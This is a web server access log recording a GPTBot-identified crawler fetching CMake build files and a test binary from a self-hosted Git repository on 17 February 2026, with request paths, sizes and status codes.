"/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:14:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16052] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:14:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:14:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10073] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:14:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12011] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:14:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11169] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20388] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11800] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29780] [Gzip 7.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11139] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:14:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16405] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:14:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:14:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9971] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:14:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11518] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:14:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9927] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:14:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10998] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:49:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:49:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9941] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:49:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10049] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:14:49:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:14:49:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9931] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:14:49:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16024] [Gzip 5.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:14:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:14:49:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39718] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:49:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11983] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:14:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10155] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10025] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:14:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11079] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16381] [Gzip 12.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:14:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:14:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11246] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:14:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11493] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:14:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:14:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:14:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9948] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:14:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51207] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/TestApp" -[17/Feb/2026:14:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10775] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" -[17/Feb/2026:14:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14615] [Gzip 5.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:49:39 